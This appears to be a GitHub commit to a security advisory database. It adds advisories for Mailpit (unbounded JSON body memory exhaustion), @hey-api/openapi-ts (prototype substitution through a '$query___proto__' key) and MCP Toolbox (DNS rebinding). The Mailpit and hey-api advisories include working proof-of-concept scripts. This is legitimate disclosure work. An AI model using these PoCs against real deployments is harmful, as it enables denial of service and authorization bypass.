Skip to content

Commit cfa8d74

Browse files
1 parent d7c5c58 commit cfa8d74

4 files changed

Lines changed: 281 additions & 5 deletions

File tree

advisories/unreviewed/2026/05/GHSA-7pf3-8xx7-rvhf/GHSA-7pf3-8xx7-rvhf.json renamed to advisories/github-reviewed/2026/05/GHSA-7pf3-8xx7-rvhf/GHSA-7pf3-8xx7-rvhf.json

Lines changed: 34 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -1,19 +1,40 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-7pf3-8xx7-rvhf",
4-
"modified": "2026-05-28T00:30:30Z",
4+
"modified": "2026-07-01T20:54:22Z",
55
"published": "2026-05-28T00:30:29Z",
66
"aliases": [
77
"CVE-2026-9739"
88
],
9+
"summary": "MCP Toolbox for Databases vulnerable to DNS rebinding attacks",
910
"details": "Vulnerable to DNS rebinding attacks when using SSE (http://b/499408790). During the beta phase, we implemented `allowed-origins` and `allowed-hosts` flags to align with MCP security guidelines. However, the hardcoded `Access-Control-Allow-Origin: *` header in the SSE initialization handler was inadvertently retained. This vulnerability specifically impacts users connecting via Toolbox using SSE under specification v2024-11-05.",
1011
"severity": [
1112
{
1213
"type": "CVSS_V4",
13-
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/googleapis/mcp-toolbox"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "1.2.0"
32+
}
33+
]
34+
}
35+
]
1436
}
1537
],
16-
"affected": [],
1738
"references": [
1839
{
1940
"type": "ADVISORY",
@@ -26,15 +47,23 @@
2647
{
2748
"type": "WEB",
2849
"url": "https://github.com/googleapis/mcp-toolbox/pull/3054"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://github.com/googleapis/mcp-toolbox/commit/c4c7bd917e686de68e2be866cfe3872c3439efae"
54+
},
55+
{
56+
"type": "PACKAGE",
57+
"url": "https://github.com/googleapis/mcp-toolbox"
2958
}
3059
],
3160
"database_specific": {
3261
"cwe_ids": [
3362
"CWE-942"
3463
],
3564
"severity": "CRITICAL",
36-
"github_reviewed": false,
37-
"github_reviewed_at": null,
65+
"github_reviewed": true,
66+
"github_reviewed_at": "2026-07-01T20:54:22Z",
3867
"nvd_published_at": "2026-05-27T23:16:48Z"
3968
}
4069
}
Lines changed: 60 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,60 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-28pq-6qxg-wg5r",
4+
"modified": "2026-07-01T20:56:10Z",
5+
"published": "2026-07-01T20:56:10Z",
6+
"aliases": [
7+
"CVE-2026-48824"
8+
],
9+
"summary": "Mailpit: Sibling-endpoint memory-exhaustion DoS via unbounded JSON body on /api/v1/messages, /api/v1/tags, and /api/v1/message/{id}/release (incomplete fix of GHSA-fpxj-m5q8-fphw)",
10+
"details": "### Summary\n\nThe fix for GHSA-fpxj-m5q8-fphw (CVE-2026-45710, \"Mailpit: Set a default 50MB p/m limit to prevent DoS via unlimited SMTP DATA and /api/v1/send body sizes\") wrapped only `POST /api/v1/send` with `http.MaxBytesReader`. The four other Mailpit JSON-body API endpoints `PUT /api/v1/messages` (SetReadStatus), `DELETE /api/v1/messages` (DeleteMessages), `PUT /api/v1/tags` (SetMessageTags), and `POST /api/v1/message/{id}/release` (ReleaseMessage) still call `json.NewDecoder(r.Body)` directly with no body-size cap and remain reachable unauthenticated in the default `docker run axllent/mailpit:latest` deploy. An unauthenticated remote attacker can post a multi-million-element `IDs` slice and drive RSS from ~25 MiB baseline to ~450 MiB per 16 MB request body. Repeating across multiple connections accumulates the same per-request amplification per process.\n\n### Affected versions\n\n- Mailpit at HEAD `67a7ca83ff759082d2b86dda07eb5bb3dad404e0` (v1.30.0, 2026-05-14).\n- All versions `<= v1.30.0` (the release that shipped the GHSA-fpxj fix). Versions `< v1.30.0` are vulnerable to the original GHSA-fpxj on `/api/v1/send`; version `v1.30.0` carries the sibling-endpoint gap described here.\n\n### Privilege required\n\nNone in default deploy (no `--ui-auth`, no `--smtp-auth`). The four endpoints share the same `middleWareFunc` wrapper as the original GHSA-fpxj target, so the same default-no-auth threat model applies. With `--ui-auth=user:pass` configured, the same primitive is post-auth — still useful since UI-auth Mailpit deployments commonly run on internal ops subnets where one stolen UI credential pivots into an RSS-exhaustion vector against the same host.\n\n### The incomplete fix\n\nCommit `136bdde` (\"Security: Set a default 50MB p/m limit to prevent DoS via unlimited SMTP DATA and /api/v1/send body sizes (GHSA-fpxj-m5q8-fphw)\", 2026-05-12) added the `MaxBytesReader` wrap in exactly one place:\n\n```go\n// server/apiv1/send.go:45-48\nif config.MaxMessageSize > 0 {\n r.Body = http.MaxBytesReader(w, r.Body, int64(config.MaxMessageSize)*1024*1024)\n}\n\ndecoder := json.NewDecoder(r.Body)\n```\n\nThe sibling JSON-body handlers were not updated. Side-by-side at HEAD `67a7ca8`:\n\n| File | Function | `MaxBytesReader`? | Unauth in default deploy? |\n|---|---|---|---|\n| `server/apiv1/send.go:45-48` (`SendMessageHandler`) | POST `/api/v1/send` | YES (50 MB) | YES (via `sendAPIAuthMiddleware` falling back to `middleWareFunc`) |\n| `server/apiv1/messages.go:107` (`SetReadStatus`) | PUT `/api/v1/messages` | NO | YES |\n| `server/apiv1/messages.go:187` (`DeleteMessages`) | DELETE `/api/v1/messages` | NO | YES |\n| `server/apiv1/tags.go:54` (`SetMessageTags`) | PUT `/api/v1/tags` | NO | YES |\n| `server/apiv1/release.go:55` (`ReleaseMessage`) | POST `/api/v1/message/{id}/release` | NO | YES |\n\nThe four sibling handlers all share the shape:\n\n```go\n// server/apiv1/messages.go:107-115 (SetReadStatus)\ndecoder := json.NewDecoder(r.Body)\n\nvar data struct {\n Read bool\n IDs []string\n Search string\n}\n\nerr := decoder.Decode(&data)\n```\n\nNo `MaxBytesReader`, no body-size cap, no `r.Header.Get(\"Content-Length\")` check. The `json.NewDecoder` streams the body but each `\"x\"` element materialises as a separate Go `string` plus slice-header overhead, so the unmarshalled `[]string` slice for `IDs` grows roughly linearly with attacker payload size.\n\n### Vulnerable code\n\n`server/apiv1/messages.go:107`:\n\n```go\nfunc SetReadStatus(w http.ResponseWriter, r *http.Request) {\n decoder := json.NewDecoder(r.Body)\n\n var data struct {\n Read bool\n IDs []string\n Search string\n }\n\n err := decoder.Decode(&data)\n if err != nil {\n httpError(w, err.Error())\n return\n }\n // ...\n```\n\nThree other handlers (`DeleteMessages`, `SetMessageTags`, `ReleaseMessage`) match the same shape.\n\n### Reachability chain (default deploy)\n\n```\nListen() # config/config.go HTTPListen = \"[::]:8025\"\n ↓\nHTTP server # server/server.go:177-186\n ↓\nmiddleWareFunc(apiv1.SetReadStatus) # server/server.go:178 — auth bypassed when UICredentials == nil\n ↓\nSetReadStatus # server/apiv1/messages.go:87\n ↓\njson.NewDecoder(r.Body).Decode(&data) # no MaxBytesReader; allocates 4M Go strings + slice for {\"IDs\":[\"x\",...]}\n ↓\nRSS grows ~28x relative to payload size\n```\n\n`config/config.go`'s `MaxMessageSize` field (added by 136bdde) exists and is parsed from `--max-message-size` (default 50 MB), but it is checked only in `server/apiv1/send.go`. The four sibling handlers never consult it.\n\n### Reproduction (E2E against `axllent/mailpit:latest` v1.30.0)\n\n```bash\n# 1) start mailpit with defaults (no --ui-auth, no --smtp-auth)\ndocker run --name mailpit-test -d -p 18025:8025 axllent/mailpit:latest\n\n# 2) baseline RSS\ndocker stats mailpit-test --no-stream --format '{{.MemUsage}}'\n# → 8.473MiB / 5.772GiB\n\n# 3) trigger\npython3 - <<'PY'\nimport socket\nN = 4_000_000\nprefix = b'{\"Read\": true, \"IDs\": ['\nitems = b'\"x\"' + (b',\"x\"' * (N - 1))\nsuffix = b']}'\nclen = len(prefix) + len(items) + len(suffix)\ns = socket.create_connection((\"localhost\", 18025), timeout=300)\ns.sendall(\n b\"PUT /api/v1/messages HTTP/1.1\\r\\n\"\n b\"Host: localhost:18025\\r\\n\"\n b\"Content-Type: application/json\\r\\n\"\n b\"Content-Length: \" + str(clen).encode() + b\"\\r\\n\"\n b\"Connection: close\\r\\n\\r\\n\")\ns.sendall(prefix)\nrem = items\nwhile rem:\n s.sendall(rem[:1024*1024]); rem = rem[1024*1024:]\ns.sendall(suffix)\ns.close()\nPY\n\n# 4) post-PoC RSS\ndocker stats mailpit-test --no-stream --format '{{.MemUsage}}'\n# → 455.8MiB / 5.772GiB\n```\n\nObserved: a single 16 MB JSON body drove Mailpit RSS from 8.473 MiB to 455.8 MiB (+447 MiB, ~28× amplification). Memory is not freed between requests; repeating the PoC over multiple TCP connections sums per-process until the operator restarts the container or the host memory pressure regime terminates it.\n\nThe same primitive reproduces on `DELETE /api/v1/messages`, `PUT /api/v1/tags`, and `POST /api/v1/message/{any-id}/release` with identical body shapes; each of the four endpoints individually reproduces the same amplification.\n\n### Impact\n\n- **Pre-auth remote memory-exhaustion DoS.** Default-deploy Mailpit (the deployment shape the README documents for dev/CI use) is reachable unauthenticated on `[::]:8025`. A single TCP connection sending one ~100 MB JSON `IDs` body drives RSS to ~2.8 GB. Multiple concurrent connections compound the per-process RSS growth. Class-and-severity match the parent CVE-2026-45710.\n- **Disk amplification (secondary).** The `IDs` slice itself is not persisted to SQLite (unlike the parent GHSA-fpxj message-body path), so disk pressure is limited to whatever the handler does downstream. For `SetReadStatus`, the slice is iterated and an UPDATE is issued for each id; with 4M entries the per-call work is also linear in `len(ids)`.\n- **Same threat model as the parent.** The maintainer chose 50 MB as the default cap for `/api/v1/send` to bound the worst case there. Without the same cap on these sibling endpoints, the per-process worst-case is unbounded.\n\n### Suggested fix\n\nApply the same `MaxBytesReader` pattern already proven on `send.go` to every JSON-body handler. Concretely, wrap each of the four sibling sites:\n\n```go\n// server/apiv1/messages.go:107 (SetReadStatus)\nif config.MaxMessageSize > 0 {\n r.Body = http.MaxBytesReader(w, r.Body, int64(config.MaxMessageSize)*1024*1024)\n}\ndecoder := json.NewDecoder(r.Body)\n\n// server/apiv1/messages.go:187 (DeleteMessages) — same wrap\n// server/apiv1/tags.go:54 (SetMessageTags) — same wrap\n// server/apiv1/release.go:55 (ReleaseMessage) — same wrap\n```\n\nA cleaner shape is to factor the cap into the existing `middleWareFunc` wrapper in `server/server.go`, so every API handler that is not an upload-style endpoint inherits the cap by default. \n\n### Credit\n\nReported by tonghuaroot.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/axllent/mailpit"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "1.30.1"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 1.30.0"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/axllent/mailpit/security/advisories/GHSA-28pq-6qxg-wg5r"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/axllent/mailpit"
49+
}
50+
],
51+
"database_specific": {
52+
"cwe_ids": [
53+
"CWE-770"
54+
],
55+
"severity": "MODERATE",
56+
"github_reviewed": true,
57+
"github_reviewed_at": "2026-07-01T20:56:10Z",
58+
"nvd_published_at": null
59+
}
60+
}
Lines changed: 57 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,57 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-hhx9-57xq-r5rw",
4+
"modified": "2026-07-01T20:55:17Z",
5+
"published": "2026-07-01T20:55:17Z",
6+
"aliases": [
7+
"CVE-2026-48819"
8+
],
9+
"summary": "@hey-api/openapi-ts's `buildClientParams` template: prototype chain substitution via unknown `$<slot>___proto__` key",
10+
"details": "### Summary\n\n`dist/clients/core/params.ts` in `@hey-api/openapi-ts` ships a runtime template that is copied verbatim into every generated SDK as `params.gen.ts`. When a caller passes an object argument containing an unknown key starting with a slot prefix (`$body_`, `$headers_`, `$path_`, `$query_`), the function strips the prefix and writes the remainder directly to that slot without validation. The key `\"$query___proto__\"` causes the returned `params.query` object to have its prototype chain substituted with attacker-controlled data. The issue is present in all versions through at least `0.97.2`.\n\n### Details\n\nThe vulnerable branch in `dist/clients/core/params.ts`:\n\n```typescript\nconst extra = extraPrefixes.find(([prefix]) => key.startsWith(prefix))\nif (extra) {\n const [prefix, slot] = extra\n ;(params[slot] as Record<string, unknown>)[key.slice(prefix.length)] = value\n}\n```\n\nThis branch runs for any key that (1) is not registered in the field map and (2) starts with one of the four slot prefixes. When a caller passes `\"$query___proto__\"` as an extra key alongside a legitimate field, the key is not in the field map, `key.startsWith(\"$query_\")` is true, and `key.slice(7)` produces `\"__proto__\"`. The bracket-write `params[\"query\"][\"__proto__\"] = value` invokes the `__proto__` setter, which calls `Object.setPrototypeOf(params.query, value)`.\n\n**Reachability.** Every generated endpoint method that accepts an object argument passes it through `buildClientParams`. If the application forwards user-supplied request parameters to a generated client method — a common pattern in proxy servers, BFF layers, and API gateways — an attacker can include `\"$query___proto__\"` alongside a legitimate field (e.g. `\"q\"`). The legitimate field ensures `stripEmptySlots` does not remove the affected slot (it has at least one own key), so the poisoned `params.query` object is returned to the caller.\n\nConcrete field config that hey-api generates for a GET endpoint with one query param `q`:\n\n```typescript\n// generated by hey-api for: GET /search?q=<string>\nbuildClientParams([parameters], [{ args: [{ in: \"query\", key: \"q\" }] }])\n```\n\nA request `{ q: \"hello\", \"$query___proto__\": { isAdmin: true } }` reaches this call with `\"q\"` going to the field map branch and `\"$query___proto__\"` falling through to `extraPrefixes`.\n\n### PoC\n\n```bash\nnpm install @hey-api/openapi-ts@0.97.2\ncp node_modules/@hey-api/openapi-ts/dist/clients/core/params.ts ./params.ts\nnpx tsx poc.ts\n# or: docker build -t heyapi-poc . && docker run --rm heyapi-poc\n```\n\n`poc.ts`:\n\n```typescript\nimport { buildClientParams } from \"./params.ts\";\n\n// Generated fields config for GET /search?q=<string>\nconst generatedFields = [{ args: [{ in: \"query\" as const, key: \"q\" }] }];\n\n// Attacker request: legitimate \"q\" plus injected \"$query___proto__\"\nconst result = buildClientParams(\n [{ q: \"hello\", \"$query___proto__\": { isAdmin: true } }],\n generatedFields\n);\n\nconst q = result.query as any;\nconsole.log(q.q); // \"hello\" — own property, normal\nconsole.log(q.isAdmin); // true — inherited via prototype chain\nconsole.log(Object.keys(q)); // [\"q\"] — own keys only\nfor (const k in result.query) console.log(k); // \"q\", \"isAdmin\"\n```\n\nExpected output:\n\n```\n[CONFIRMED] buildClientParams prototype substitution via $query___proto__ key\n Scenario: GET /search with fields [{ in:'query', key:'q' }]\n Attacker request: { q: 'hello', '$query___proto__': { isAdmin: true } }\n\n result.query.q = hello\n result.query.isAdmin = true ← inherited, NOT own\n Object.keys(q) = [ 'q' ]\n for..in keys = q, isAdmin\n Object.getPrototypeOf = {\"isAdmin\":true}\n```\n\nNo sentinel key is needed. The legitimate field `\"q\"` keeps `params.query` alive through `stripEmptySlots`.\n[reproduce.zip](https://github.com/user-attachments/files/27953600/reproduce.zip)\n\n\n\n### Impact\n\nThe returned `params.query` object has its prototype chain substituted with the attacker-supplied value. Any downstream code that iterates it with `for..in` (e.g., when serializing query parameters for an outgoing HTTP request) will enumerate the injected keys alongside legitimate ones. Applications that check inherited properties on the params object for routing or authorization decisions are also affected.\n\nGlobal `Object.prototype` is not modified — impact is limited to the returned slot object and its consumers.\n\nEvery npm package generated by `@hey-api/openapi-ts` carries this template. Downstream packages include `@opencode-ai/sdk`, `@trigger.dev/sdk`, and others. A fix in the template propagates to all of them on regeneration.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "@hey-api/openapi-ts"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "0.97.3"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/hey-api/openapi-ts/security/advisories/GHSA-hhx9-57xq-r5rw"
42+
},
43+
{
44+
"type": "PACKAGE",
45+
"url": "https://github.com/hey-api/openapi-ts"
46+
}
47+
],
48+
"database_specific": {
49+
"cwe_ids": [
50+
"CWE-1321"
51+
],
52+
"severity": "MODERATE",
53+
"github_reviewed": true,
54+
"github_reviewed_at": "2026-07-01T20:55:17Z",
55+
"nvd_published_at": null
56+
}
57+
}

0 commit comments

Comments
 (0)